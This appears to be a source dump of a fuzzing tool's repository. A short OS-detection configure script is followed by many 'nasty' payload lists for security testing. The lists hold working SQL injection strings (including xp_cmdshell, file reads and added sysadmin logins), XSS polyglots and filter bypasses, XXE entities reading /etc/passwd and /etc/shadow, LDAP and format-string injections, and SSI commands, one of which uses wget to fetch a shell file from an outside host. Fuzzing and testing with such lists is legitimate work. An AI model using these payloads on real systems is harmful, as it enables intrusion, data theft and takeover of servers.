AM_CONDITIONAL(OS_IS_REDHAT, [ test `grep "Fedora\|Redhat" /etc/os-release | wc -l` -gt "0" ]) 73 | if test "$OS_IS_REDHAT" = "0"; then 74 | AC_DEFINE([__REDHAT], [], ["build for RedHat"]) 75 | AC_MSG_NOTICE([trying to build for a RedHat based system]) 76 | fi 77 | AM_CONDITIONAL(OS_IS_DEBIAN, [ test `grep "Debian\|Ubuntu\|Kali" /etc/os-release | wc -l` -gt "0" ]) 78 | if test "$OS_IS_DEBIAN" = "0"; then 79 | AC_DEFINE([__DEBIAN], [], ["build for Debian"]) 80 | AC_MSG_NOTICE([trying to build for a Debian based system]) 81 | fi 82 | 
AM_CONDITIONAL(OS_IS_KALI, [ test `grep "Kali" /etc/os-release | wc -l` -gt "0" ]) 83 | if test "$OS_IS_KALI" = "0"; then 84 | AC_DEFINE([__KALI__], [], ["build for Kali"]) 85 | AC_MSG_NOTICE([trying to build for a Kali based system]) 86 | fi 87 | AM_CONDITIONAL(OS_IS_ARCH, [ test `grep "arch" -i /etc/os-release | wc -l` -gt "0" ]) 88 | if test "$OS_IS_ARCH" = "0"; then 89 | AC_DEFINE([__ARCH__], [], ["build for Arch"]) 90 | AC_MSG_NOTICE([trying to build for a Arch based system]) 91 | fi 92 | AM_CONDITIONAL(OS_IS_FREEBSD, [ test `uname -o` == "FreeBSD" ]) 93 | if test "$IS_IS_FREEBSD" = "0"; then 94 | AC_DEFINE([__UNKNOWN], [], ["build for FreeBSD"]) 95 | AC_MSG_NOTICE([trying to build for a FreeBSD based system]) 96 | fi 97 | AM_CONDITIONAL(OS_IS_UNKNOWN, [ test `test -e /dummy; echo $?` -eq "0" ]) 98 | if test "$OS_IS_UNKNOWN" = "0"; then 99 | AC_DEFINE([__UNKNOWN], [], ["build for Unknown"]) 100 | AC_MSG_NOTICE([trying to build for a unknown system]) 101 | fi 102 | AC_OUTPUT 103 | -------------------------------------------------------------------------------- /examples/all: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/all -------------------------------------------------------------------------------- /examples/nasty/DB2Enumeration.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, 
coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /examples/nasty/FORMATSTRING-JHADDIX.txt: -------------------------------------------------------------------------------- 1 | %p%p%p%p 2 | %p%p%p%p%p%p%p%p%p%p 3 | %p * 55 4 | %p * 129 5 | %p * 257 6 | %p * 513 7 | %x%x%x%x 8 | %x%x%x%x%x%x%x%x%x%x 9 | %x * 55 10 | %x * 129 11 | %x * 257 12 | %x * 513 13 | %d%d%d%d 14 | %d%d%d%d%d%d%d%d%d%d 15 | %d * 55 16 | %d * 129 17 | %d * 257 18 | %d * 513 19 | %s%s%s%s 20 | %s%s%s%s%s%s%s%s%s%s 21 | %s * 55 22 | %s * 129 23 | %s * 257 24 | %s * 513 25 | %n%n%n%n 26 | %n%n%n%n%n%n%n%n%n%n 27 | %n * 55 28 | %n * 129 29 | %n * 257 30 | %n * 513 31 | %u%u%u%u 32 | %u%u%u%u%u%u%u%u%u%u 33 | %u * 55 34 | %u * 129 35 | %u * 257 36 | %u * 513 37 | %%%%%%%% 38 | %%%%%%%%%%%%%%%%%%%% 39 | %% * 55 40 | %% * 129 41 | %% * 257 42 | %% * 513 43 | %s%p%x%d 44 | %s%p%x%d%s%p%x%d%s%p%x%d 45 | %s%p%x%d * 55 46 | %s%p%x%d * 129 47 | %s%p%x%d * 257 48 | %s%p%x%d * 513 49 | .1024d 50 | %.2049d 51 | %99999999999s 52 | %08x 53 | %%20d 54 | %%20n 55 | %%20x 56 | %%20s 57 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 58 | %s%p%x%d 59 | .1024d 60 | %.2049d 61 | %p%p%p%p 62 | %x%x%x%x 63 | %d%d%d%d 64 | %s%s%s%s 65 | %99999999999s 66 | %08x 67 | %%20d 68 | %%20n 69 | %%20x 70 | %%20s 71 | %s%s%s%s%s%s%s%s%s%s 72 | %p%p%p%p%p%p%p%p%p%p 73 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 74 | %s x 129 75 | %x x 257 76 | -------------------------------------------------------------------------------- /examples/nasty/FuzzingStrings-SkullSecurity.org.txt: -------------------------------------------------------------------------------- 1 | "A" x 33 2 | "A" x 254 3 | "A" x 255 4 | "A" x 511 5 | "A" x 1023 6 | "A" x 1024 7 | "A" x 2047 8 | "A" x 2048 9 | "A" x 4096 10 | "A" x 5000 11 | "A" x 10000 12 | "A" x 20000 13 | "A" x 30000 14 | "A" x 40000 15 | "A" x 
65530 16 | "A" x 65536 17 | "A" x 75536 18 | "%s" x 4 19 | "%s" x 8 20 | "%s" x 15 21 | "%s" x 30 22 | "%x" x 1024 23 | "%n" x 1025 24 | "%s" x 2048 25 | "%s%n%x%d" x 5000 26 | "%s" x 30000 27 | "%s" x 40000 28 | "%.1024d" 29 | "%.2048d" 30 | "%.4096d" 31 | "%.8200d" 32 | "%99999999999s" 33 | "%99999999999d" 34 | "%99999999999x" 35 | "%99999999999n" 36 | "%99999999999s" x 1000 37 | "%99999999999d" x 1000 38 | "%99999999999x" x 1000 39 | "%99999999999n" x 1000 40 | "%08x" x 100 41 | "%%20s" x 1000 42 | "%%20x" x 1000 43 | "%%20n" x 1000 44 | "%%20d" x 1000 45 | "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x" 46 | 47 | -------------------------------------------------------------------------------- /examples/nasty/Generic-BlindSQLi.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | # from wapiti 2 | sleep(__TIME__)# 3 | 1 or sleep(__TIME__)# 4 | " or sleep(__TIME__)# 5 | ' or sleep(__TIME__)# 6 | " or sleep(__TIME__)=" 7 | ' or sleep(__TIME__)=' 8 | 1) or sleep(__TIME__)# 9 | ") or sleep(__TIME__)=" 10 | ') or sleep(__TIME__)=' 11 | 1)) or sleep(__TIME__)# 12 | ")) or sleep(__TIME__)=" 13 | ')) or sleep(__TIME__)=' 14 | ;waitfor delay '0:0:__TIME__'-- 15 | );waitfor delay '0:0:__TIME__'-- 16 | ';waitfor delay '0:0:__TIME__'-- 17 | ";waitfor delay '0:0:__TIME__'-- 18 | ');waitfor delay '0:0:__TIME__'-- 19 | ");waitfor delay '0:0:__TIME__'-- 20 | ));waitfor delay '0:0:__TIME__'-- 21 | '));waitfor delay '0:0:__TIME__'-- 22 | "));waitfor delay '0:0:__TIME__'-- 23 | benchmark(10000000,MD5(1))# 24 | 1 or benchmark(10000000,MD5(1))# 25 | " or benchmark(10000000,MD5(1))# 26 | ' or benchmark(10000000,MD5(1))# 27 | 1) or benchmark(10000000,MD5(1))# 28 | ") or benchmark(10000000,MD5(1))# 29 | ') or benchmark(10000000,MD5(1))# 30 | 1)) or benchmark(10000000,MD5(1))# 31 | ")) or benchmark(10000000,MD5(1))# 32 | ')) or 
benchmark(10000000,MD5(1))# 33 | pg_sleep(__TIME__)-- 34 | 1 or pg_sleep(__TIME__)-- 35 | " or pg_sleep(__TIME__)-- 36 | ' or pg_sleep(__TIME__)-- 37 | 1) or pg_sleep(__TIME__)-- 38 | ") or pg_sleep(__TIME__)-- 39 | ') or pg_sleep(__TIME__)-- 40 | 1)) or pg_sleep(__TIME__)-- 41 | ")) or pg_sleep(__TIME__)-- 42 | ')) or pg_sleep(__TIME__)-- 43 | -------------------------------------------------------------------------------- /examples/nasty/Generic-SQLi.txt: -------------------------------------------------------------------------------- 1 | )%20or%20('x'='x 2 | %20or%201=1 3 | ; execute immediate 'sel' || 'ect us' || 'er' 4 | benchmark(10000000,MD5(1))# 5 | update 6 | ";waitfor delay '0:0:__TIME__'-- 7 | 1) or pg_sleep(__TIME__)-- 8 | ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 9 | "hi"") or (""a""=""a" 10 | delete 11 | like 12 | " or sleep(__TIME__)# 13 | pg_sleep(__TIME__)-- 14 | *(|(objectclass=*)) 15 | declare @q nvarchar (200) 0x730065006c00650063 ... 16 | or 0=0 # 17 | insert 18 | 1) or sleep(__TIME__)# 19 | ) or ('a'='a 20 | ; exec xp_regread 21 | *| 22 | @var select @var as var into temp end -- 23 | 1)) or benchmark(10000000,MD5(1))# 24 | asc 25 | (||6) 26 | "a"" or 3=3--" 27 | " or benchmark(10000000,MD5(1))# 28 | # from wapiti 29 | or 0=0 -- 30 | 1 waitfor delay '0:0:10'-- 31 | or 'a'='a 32 | hi or 1=1 --" 33 | or a = a 34 | UNION ALL SELECT 35 | ) or sleep(__TIME__)=' 36 | )) or benchmark(10000000,MD5(1))# 37 | hi' or 'a'='a 38 | 0 39 | 21 % 40 | limit 41 | or 1=1 42 | or 2 > 1 43 | ")) or benchmark(10000000,MD5(1))# 44 | PRINT 45 | hi') or ('a'='a 46 | or 3=3 47 | ));waitfor delay '0:0:__TIME__'-- 48 | a' waitfor delay '0:0:10'-- 49 | 1;(load_file(char(47,101,116,99,47,112,97,115, ... 50 | or%201=1 51 | 1 or sleep(__TIME__)# 52 | or 1=1 53 | and 1 in (select var from temp)-- 54 | or '7659'='7659 55 | or 'text' = n'text' 56 | -- 57 | or 1=1 or ''=' 58 | declare @s varchar (200) select @s = 0x73656c6 ... 
59 | exec xp 60 | ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 61 | 3.10E+17 62 | " or pg_sleep(__TIME__)-- 63 | x' AND email IS NULL; -- 64 | & 65 | admin' or ' 66 | or 'unusual' = 'unusual' 67 | // 68 | truncate 69 | 1) or benchmark(10000000,MD5(1))# 70 | \x27UNION SELECT 71 | declare @s varchar(200) select @s = 0x77616974 ... 72 | tz_offset 73 | sqlvuln 74 | "));waitfor delay '0:0:__TIME__'-- 75 | ||6 76 | or%201=1 -- 77 | %2A%28%7C%28objectclass%3D%2A%29%29 78 | or a=a 79 | ) union select * from information_schema.tables; 80 | PRINT @@variable 81 | or isNULL(1/0) /* 82 | 26 % 83 | " or "a"="a 84 | (sqlvuln) 85 | x' AND members.email IS NULL; -- 86 | or 1=1-- 87 | and 1=( if((load_file(char(110,46,101,120,11 ... 88 | 0x770061006900740066006F0072002000640065006C00 ... 89 | %20'sleep%2050' 90 | as 91 | 1)) or pg_sleep(__TIME__)-- 92 | /**/or/**/1/**/=/**/1 93 | union all select @@version-- 94 | ,@variable 95 | (sqlattempt2) 96 | or (EXISTS) 97 | t'exec master..xp_cmdshell 'nslookup www.googl ... 98 | %20$(sleep%2050) 99 | 1 or benchmark(10000000,MD5(1))# 100 | %20or%20''=' 101 | ||UTL_HTTP.REQUEST 102 | or pg_sleep(__TIME__)-- 103 | hi' or 'x'='x'; 104 | ") or sleep(__TIME__)=" 105 | or 'whatever' in ('whatever') 106 | ; begin declare @var varchar(8000) set @var=' ... 107 | union select 1,load_file('/etc/passwd'),1,1,1; 108 | 0x77616974666F722064656C61792027303A303A313027 ... 109 | exec(@s) 110 | ) or pg_sleep(__TIME__)-- 111 | union select 112 | or sleep(__TIME__)# 113 | select * from information_schema.tables-- 114 | a' or 1=1-- 115 | a' or 'a' = 'a 116 | declare @s varchar(22) select @s = 117 | or 2 between 1 and 3 118 | or a=a-- 119 | or '1'='1 120 | | 121 | or sleep(__TIME__)=' 122 | or 1 --' 123 | or 0=0 #" 124 | having 125 | a' 126 | " or isNULL(1/0) /* 127 | declare @s varchar (8000) select @s = 0x73656c ... 
128 | ‘ or 1=1 -- 129 | char%4039%41%2b%40SELECT 130 | order by 131 | bfilename 132 | having 1=1-- 133 | ) or benchmark(10000000,MD5(1))# 134 | or username like char(37); 135 | ;waitfor delay '0:0:__TIME__'-- 136 | " or 1=1-- 137 | x' AND userid IS NULL; -- 138 | */* 139 | or 'text' > 't' 140 | (select top 1 141 | or benchmark(10000000,MD5(1))# 142 | ");waitfor delay '0:0:__TIME__'-- 143 | a' or 3=3-- 144 | -- &password= 145 | group by userid having 1=1-- 146 | or ''=' 147 | ; exec master..xp_cmdshell 148 | %20or%20x=x 149 | select 150 | ")) or sleep(__TIME__)=" 151 | 0x730065006c0065006300740020004000400076006500 ... 152 | hi' or 1=1 -- 153 | ") or pg_sleep(__TIME__)-- 154 | %20or%20'x'='x 155 | or 'something' = 'some'+'thing' 156 | exec sp 157 | 29 % 158 | ( 159 | ý or 1=1 -- 160 | 1 or pg_sleep(__TIME__)-- 161 | 0 or 1=1 162 | ) or (a=a 163 | uni/**/on sel/**/ect 164 | replace 165 | %27%20or%201=1 166 | )) or pg_sleep(__TIME__)-- 167 | %7C 168 | x' AND 1=(SELECT COUNT(*) FROM tabname); -- 169 | '%20OR 170 | ; or '1'='1' 171 | declare @q nvarchar (200) select @q = 0x770061 ... 172 | 1 or 1=1 173 | ; exec ('sel' + 'ect us' + 'er') 174 | 23 OR 1=1 175 | / 176 | anything' OR 'x'='x 177 | declare @q nvarchar (4000) select @q = 178 | or 0=0 -- 179 | desc 180 | ||'6 181 | ) 182 | 1)) or sleep(__TIME__)# 183 | or 0=0 # 184 | select name from syscolumns where id = (sele ... 185 | hi or a=a 186 | *(|(mail=*)) 187 | password:*/=1-- 188 | distinct 189 | );waitfor delay '0:0:__TIME__'-- 190 | to_timestamp_tz 191 | ") or benchmark(10000000,MD5(1))# 192 | UNION SELECT 193 | %2A%28%7C%28mail%3D%2A%29%29 194 | +sqlvuln 195 | or 1=1 /* 196 | )) or sleep(__TIME__)=' 197 | or 1=1 or ""= 198 | or 1 in (select @@version)-- 199 | sqlvuln; 200 | union select * from users where login = char ... 201 | x' or 1=1 or 'x'='y 202 | 28 % 203 | ‘ or 3=3 -- 204 | @variable 205 | or '1'='1'-- 206 | "a"" or 1=1--" 207 | //* 208 | %2A%7C 209 | " or 0=0 -- 210 | ")) or pg_sleep(__TIME__)-- 211 | ? 
212 | or 1/* 213 | ! 214 | ' 215 | or a = a 216 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 217 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 218 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 219 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 220 | ' or 1=1 221 |  or 1=1 -- 222 | x' OR full_name LIKE '%Bob% 223 | '; exec master..xp_cmdshell 'ping 172.10.1.255'-- 224 | '%20or%20''=' 225 | '%20or%20'x'='x 226 | ')%20or%20('x'='x 227 | ' or 0=0 -- 228 | ' or 0=0 # 229 | or 0=0 #" 230 | ' or 1=1-- 231 | ' or '1'='1'-- 232 | ' or 1 --' 233 | or 1=1-- 234 | ' or 1=1 or ''=' 235 | or 1=1 or ""= 236 | ' or a=a-- 237 | or a=a 238 | ') or ('a'='a 239 | 'hi' or 'x'='x'; 240 | or 241 | procedure 242 | handler 243 | ' or username like '% 244 | ' or uname like '% 245 | ' or userid like '% 246 | ' or uid like '% 247 | ' or user like '% 248 | '; exec master..xp_cmdshell 249 | '; exec xp_regread 250 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 251 | --sp_password 252 | ' UNION SELECT 253 | ' UNION ALL SELECT 254 | ' or (EXISTS) 255 | ' (select top 1 256 | '||UTL_HTTP.REQUEST 257 | 1;SELECT%20* 258 | <>"'%;)(&+ 259 | '%20or%201=1 260 | 'sqlattempt1 261 | %28 262 | %29 263 | %26 264 | %21 265 | ' or ''=' 266 | ' or 3=3 267 |  or 3=3 -- 268 | -------------------------------------------------------------------------------- /examples/nasty/LDAP.Fuzzinging.txt: -------------------------------------------------------------------------------- 1 | ! 
2 | %21 3 | %26 4 | %28 5 | %29 6 | %2A%28%7C%28mail%3D%2A%29%29 7 | %2A%28%7C%28objectclass%3D%2A%29%29 8 | %2A%7C 9 | %7C 10 | & 11 | ( 12 | ) 13 | *(|(mail=*)) 14 | *(|(objectclass=*)) 15 | */* 16 | *| 17 | / 18 | // 19 | //* 20 | @* 21 | x' or name()='username' or 'x'='y 22 | | 23 | *()|&' 24 | admin* 25 | admin*)((|userpassword=*) 26 | *)(uid=*))(|(uid=* 27 | -------------------------------------------------------------------------------- /examples/nasty/MSSQL-Enumeration.fuzzdb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/nasty/MSSQL-Enumeration.fuzzdb.txt -------------------------------------------------------------------------------- /examples/nasty/MSSQL.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify some of the vaules in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, 
NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /examples/nasty/MYSQL.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | -------------------------------------------------------------------------------- /examples/nasty/Metacharacters.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | !' 2 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 3 | !@#0%^#0##018387@#0^^**(() 4 | ">\x3csVg/\x3e 2 | -------------------------------------------------------------------------------- /examples/nasty/Polyglots/XSS-Polyglots-Dmiessler.txt: -------------------------------------------------------------------------------- 1 | javascript://'/-->*/alert()/* 2 | javascript://-->"/*/a 3 | javascript://"/*// 4 | javascript://-->*/alert()/* 5 | javascript://'//" -->*/alert()/* 6 | javascript://
  • */alert()/* 8 | -->"/*/alert()/* 9 | /*/alert()/* 10 | javascript://-->*/alert()/* 12 | -------------------------------------------------------------------------------- /examples/nasty/Polyglots/XSS-Polyglots.txt: -------------------------------------------------------------------------------- 1 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> 2 | “ onclick=alert(1)//"><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 4 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 5 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 6 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 7 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 8 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 9 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 10 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 11 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 12 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 13 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 14 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* 15 | -------------------------------------------------------------------------------- /examples/nasty/Postgres-Enumeration.fuzzdb.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select 
version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | -------------------------------------------------------------------------------- /examples/nasty/SSI-Injection-JHADDIX.txt: -------------------------------------------------------------------------------- 1 | <pre><!--#exec cmd="ls" --></pre> 2 | <pre><!--#echo var="DATE_LOCAL" --> </pre> 3 | <pre><!--#exec cmd="whoami"--></pre> 4 | <pre><!--#exec cmd="dir" --></pre> 5 | <!--#exec cmd="ls" --> 6 | <!--#exec cmd="wget http://website.com/dir/shell.txt" --> 7 | <!--#exec cmd="/bin/ls /" --> 8 | <!--#exec cmd="dir" --> 9 | <!--#exec cmd="cd C:\WINDOWS\System32"> 10 | <!--#config errmsg="File not found, informs users and password"--> 11 | <!--#echo var="DOCUMENT_NAME" --> 12 | <!--#echo var="DOCUMENT_URI" --> 13 | <!--#config timefmt="A %B %d %Y %r"--> 14 | <!--#fsize file="ssi.shtml" --> 15 | <!--#include file=?UUUUUUUU...UU?--> 16 | <!--#echo var="DATE_LOCAL" --> 17 | <!--#exec cmd="whoami"--> 18 | <!--#printenv --> 19 | <!--#flastmod virtual="echo.html" --> 20 | <!--#echo var="auth_type" --> 21 | <!--#echo var="http_referer" --> 22 | <!--#echo var="content_length" --> 23 | <!--#echo var="content_type" --> 24 | <!--#echo var="http_accept_encoding" --> 25 | <!--#echo var="forwarded" --> 26 | <!--#echo var="document_uri" --> 27 | <!--#echo var="date_gmt" 
--> 28 | <!--#echo var="date_local" --> 29 | <!--#echo var="document_name" --> 30 | <!--#echo var="document_root" --> 31 | <!--#echo var="from" --> 32 | <!--#echo var="gateway_interface" --> 33 | <!--#echo var="http_accept" --> 34 | <!--#echo var="http_accept_charset" --> 35 | <!--#echo var="http_accept_language" --> 36 | <!--#echo var="http_connection" --> 37 | <!--#echo var="http_cookie" --> 38 | <!--#echo var="http_form" --> 39 | <!--#echo var="http_host" --> 40 | <!--#echo var="user_name" --> 41 | <!--#echo var="unique_id" --> 42 | <!--#echo var="tz" --> 43 | <!--#echo var="total_hits" --> 44 | <!--#echo var="server_software" --> 45 | <!--#echo var="server_protocol" --> 46 | <!--#echo var="server_port" --> 47 | <!--#echo var="server_name --> 48 | <!--#echo var="server_addr" --> 49 | <!--#echo var="server_admin" --> 50 | <!--#echo var="script_url" --> 51 | <!--#echo var="script_uri" --> 52 | <!--#echo var="script_name" --> 53 | <!--#echo var="script_filename" --> 54 | <!--#echo var="netsite_root" --> 55 | <!--#echo var="site_htmlroot" --> 56 | <!--#echo var="path_translated" --> 57 | <!--#echo var="path_info_translated" --> 58 | <!--#echo var="request_uri" --> 59 | <!--#echo var="request_method" --> 60 | <!--#echo var="remote_user" --> 61 | <!--#echo var="remote_addr" --> 62 | <!--#echo var="http_client_ip" --> 63 | <!--#echo var="remote_port" --> 64 | <!--#echo var="remote_ident" --> 65 | <!--#echo var="remote_host" --> 66 | <!--#echo var="query_string_unescaped" --> 67 | <!--#echo var="query_string" --> 68 | <!--#echo var="path_translated" --> 69 | <!--#echo var="path_info" --> 70 | <!--#echo var="path" --> 71 | <!--#echo var="page_count" --> 72 | <!--#echo var="last_modified" --> 73 | <!--#echo var="http_user_agent" --> 74 | <!--#echo var="http_ua_os" --> 75 | <!--#echo var="http_ua_cpu" --> 76 | -------------------------------------------------------------------------------- /examples/nasty/URI-XSS.fuzzdb.txt: 
-------------------------------------------------------------------------------- 1 | # Contains statements from jbrofuzz (13 April 2010) 2 | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" 3 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 4 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 5 | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 6 | 7 | -------------------------------------------------------------------------------- /examples/nasty/XML-FUZZ.txt: -------------------------------------------------------------------------------- 1 | ## After XML Declaration 2 | 3 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 4 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 5 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> 6 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> 7 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> 8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> 9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM 
"file:///dev/random">]><foo>&xee;</foo> 10 | <!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:/boot.ini"> 11 | ]> 12 | <!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd"> 13 | ]> 14 | "<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>" 15 | "<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 16 | "<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" 17 | "<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>" 18 | <name>','')); phpinfo(); exit;/*</name> 19 | 20 | 21 | ## Element and Attrib Values 22 | 23 | null 24 | * 25 | % 26 | @ 27 | $ 28 | - 29 | + 30 | ; 31 | : 32 | 0 33 | -1 34 | 1 35 | 0.1 36 | 0.9 37 | true 38 | false 39 | 1.7976931348623157e+308 40 | 5e-324 41 | 0.00005 42 | 5e-10 43 | &apos;XoiZR 44 | &quot;XoiZR 45 | &lt;Tnn96&gt; 46 | &lt;?Tnn96 ?&gt; 47 | &lt;? 
Tnn96 ?&gt; 48 | &lt;% Tnn96 %&gt; 49 | &lt;%= Tnn96 %&gt; 50 | [Tnn96] 51 | (Tnn96) 52 | {Tnn96} 53 | {{Tnn96}} 54 | {= Tnn96} 55 | {{= Tnn96}} 56 | ' or '1'='1 57 | ' or ''=' 58 | x' or 1=1 or 'x'='y 59 | / 60 | // 61 | //* 62 | */* 63 | @* 64 | count(/child::node()) 65 | x' or name()='username' or 'x'='y 66 | -------------------------------------------------------------------------------- /examples/nasty/XSS-BYPASS-STRINGS-BRUTELOGIC.txt: -------------------------------------------------------------------------------- 1 | alert`1` 2 | alert&lpar;1&rpar; 3 | alert&#x28;1&#x29 4 | alert&#40;1&#41 5 | (alert)(1) 6 | a=alert,a(1) 7 | [1].find(alert) 8 | top["al"+"ert"](1) 9 | top[/al/.source+/ert/.source](1) 10 | al\u0065rt(1) 11 | top['al\145rt'](1) 12 | top['al\x65rt'](1) 13 | top[8680439..toString(30)](1) 14 | navigator.vibrate(500) 15 | eval(URL.slice(-8))>#alert(1) 16 | eval(location.hash.slice(1)>#alert(1) 17 | innerHTML=location.hash>#<script>alert(1)</script> 18 | -------------------------------------------------------------------------------- /examples/nasty/XSS-BruteLogic.txt: -------------------------------------------------------------------------------- 1 | <svg onload=alert(1)> 2 | "><svg onload=alert(1)// 3 | "onmouseover=alert(1)// 4 | 